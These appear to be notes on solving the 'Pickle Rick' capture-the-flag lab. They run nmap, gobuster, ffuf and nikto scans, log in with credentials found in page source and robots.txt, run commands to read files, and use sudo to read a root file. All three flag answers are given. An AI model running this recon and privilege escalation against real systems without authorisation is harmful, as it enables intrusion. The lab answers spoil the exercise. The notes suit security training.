Pickle Rick

subl Readme.md - creates a cread me file

s1: nmap scan: nmap -sC -sV -oN 10.10.221.23

visit webpage: 10.10.221.23

review source code, found username: R1ckRul3s

run gobuster scan to find directories: gobuster dir -u http://10.10.221.23/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.zip OR

Directory found:

/login.php (Status: 200) /assets (Status: 301) /portal.php (Status: 302) /robots.txt (Status: 200) /denied.php (Status: 302) /server-status (Status: 403) /clue.txt (Status: 200)

ffuf -u http://10.10.221.23/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.php,.zip

perform a nikto scan: nikto -h ip_domain_name

results: "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).

/login.php: Admin login page/section found.

visiting http://10.10.221.23/robots.txt : the text Wubbalubbadubdub was found.

visit /login.php, use username: R1ckRul3s, password: Wubbalubbadubdub

use ls to list files

use less Sup3rS3cretPickl3Ingred.txt to reveal first ingredient.

less clue.txt: look around file system for other ingredient.

cd /home/rick; ls; pwd | result: second ingredients /home/rick

less cd/home/rick/"second ingredients" | result: 1 jerry tear

run sudo ls /root | result 3rd.txt

run sudo less /root/3rd.txt | result: 3rd ingredients: fleeb juice